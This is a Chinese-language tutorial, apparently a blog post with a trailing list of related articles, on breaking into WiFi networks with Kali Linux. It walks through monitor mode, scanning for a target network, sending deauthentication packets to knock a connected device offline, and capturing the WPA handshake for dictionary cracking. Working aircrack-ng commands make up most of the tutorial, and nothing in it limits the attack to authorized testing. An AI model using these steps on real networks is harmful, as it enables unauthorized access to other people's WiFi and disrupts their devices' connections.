KALI - 暴破wifi之抓取握手包
KALI - 暴破wifi之抓取握手包
提示:要有外置的 支持 kali 的 usb 无线网卡,虚拟机要把vmware的usb服务和网卡启用。
1.查看网卡信息
sudo airmon-ng
或者
sudo ifconfig
2.开启监听模式
sudo airmon-ng start wlan0
执行成功之后网卡接口变为wlan0mon,可以继续用步骤1的方法查看。
3.扫描wifi
sudo airodump-ng wlan0mon
然后会自动扫描列出附近wifi
记下目标wifi的频道号(CH)和BSSID。
按 Ctrl
+C
停止扫描
4.抓取握手包
该步骤原理:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送包含hash加密的密码数据tcp包,我们的设备伪装成目标wifi窃取该数据包。窃取后即可用字典暴破WiFi密码。(因此目标wifi中至少有一个连接的设备)
开始抓包
sudo airodump-ng -c 6 --bssid 04:95:E6:C3:14:A9 -w ~/ wlan0mon
参数:-c 指定频道号--bssid 指定路由器bssid-w 指定抓取的握手包存储路径最后是指定网卡接口
可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。
迫使设备重新连接
开始抓包后,我们需要等用户连接我们伪装的wifi,才能抓到包。所以我们需要利用aireplay-ng工具,给连接到wifi的一个设备发送deauth(反认证)包,使该设备断开wifi,随后它自然会再次连接wifi。
sudo aireplay-ng -0 2 -a 04:95:E6:C3:14:A9 -c 38:01:46:8E:E5:20 wlan0mon
参数解释:-0 攻击次数(-0 2 即攻击2次,-0 0为无限次数)-a 指定无线路由器BSSID-c 指定强制断开的设备最后是指定网卡接口
出现WPA handshake时,表示抓包成功
按 Ctrl
+C
停止抓包
最后得到一个后缀为 .cap
的握手包文件再拿去暴破
KALI - 暴破wifi之抓取握手包相关推荐
- 【wifi】抓取握手包
前言 需要购买一个支持linux系统且免驱动的网卡 1.查看网卡 ifconfig 2.开启监听模式 airmon-ng start wlan0 3.查看周围的wifi信息 airodump-ng w ...
- Kali aircrack-ng 暴破wifi
******* 准备: 1.VMware 15.5Pro.kali系统 2.外接无线网卡(某宝.便宜.免安装) 1.连接网卡 记得开启VMUSBArbService服务: 2.iwconfig查看无线 ...
- 抓取握手包暴力破解wifi
抓取握手包,暴力破解 1.连接外置网卡,把网卡设为监听模式. 监听之前先把network-manager服务禁用:service network-manager stop 2.关闭有可能影响aircr ...
- 【2】Kali破解家用WI-FI密码 - WPA/WPA2加密
[学习记录] 本人小白一枚,文章用来记录自己目前的学习进度,希望能够用最通俗易懂的语言和命令来为大家讲清楚我的实验过程和经验,同时期待我的学习经验也可以帮助到大家.还望各位大佬能不吝朱玉,指出我的错误 ...
- 使用 Kali Linux 爆破 WiFi 密码
所需工具:Kali Linux 系统 无线网卡(免驱动) 需要用到的命令: airmon-ng #查看网卡是否支持监听模式 airmon-ng start 网卡名 #开启网卡监听 airodum ...
- 使用wireshark抓取bilibili直播的真实地址
使用wireshark抓取bilibili直播的真实地址 一. 概述 我之前测试过bilibili的直播(主播使用OBS-studio推送),延迟是相当低,大概就是3s-4s延迟,所以猜测网上说的直播 ...
- 网络爬虫系列之网页抓取
(你的世界是个什么样的世界?你说,我们倾听!) ----------------- 网页抓取 我们在抓取网页时需要安装requests包,具体安装过程如下: pip install request ...
- 抓取WiFi空口包的方式总结
依赖特定设备抓包 某些路由器,支持把无线网卡设置成monitor模式.因此,可通过此类设备,抓取WiFi空口包.步骤如下: 打开WiFi配置文件(/etc/config/wireless),增加如下字 ...
- 安装抓取WIFI CSI的工具
前言:由于开放的CSI工具特别多,不同开发者的版本对应着不同linux内核环境,本博客选用linux16.04版本,不推荐使用linux14.04等其他版本的csi tool,设置很繁琐.这里我们选用 ...
最新文章
- 如何将Vision Transformer应用在移动端?
- 【手写系列】透彻理解Spring事务设计思想之手写实现
- 云信私有化方案中如何搭建高可用的日志和监控平台?
- python爬虫贴吧_Python爬虫简单实现,贴吧图片一键下
- threejs向量夹角和夹角方向
- NumPy Cookbook 带注释源码 二、NumPy 高级索引和数组概念
- 二叉搜索树的后序遍历
- 考场自动安排工具开发手记
- 一个服务调用另一个服务的步骤
- java判断日文_如何判断字符串中含有日文字符
- Springboot 集成 Camunda
- 华为荣耀X1相机或图库图标被删除后的恢复方法(不需要恢复出厂设置)!
- Nginx缓存静态文件
- 【077】Flight Aware-实时航班和机场状态更新
- 使用汽车VIN码识别的好处有哪些
- Windows桌面下面任务栏无法点击(卡住)的解决办法
- 重磅!中国商业联合会专家委员会商贸物流与供应链智库成立在即
- wps字体缺失,问题
- 测试人员必知的软件测试文档有哪些?
- 职称计算机考试输入破折号,2015职称计算机考试Dreamweaver考前测试题及答案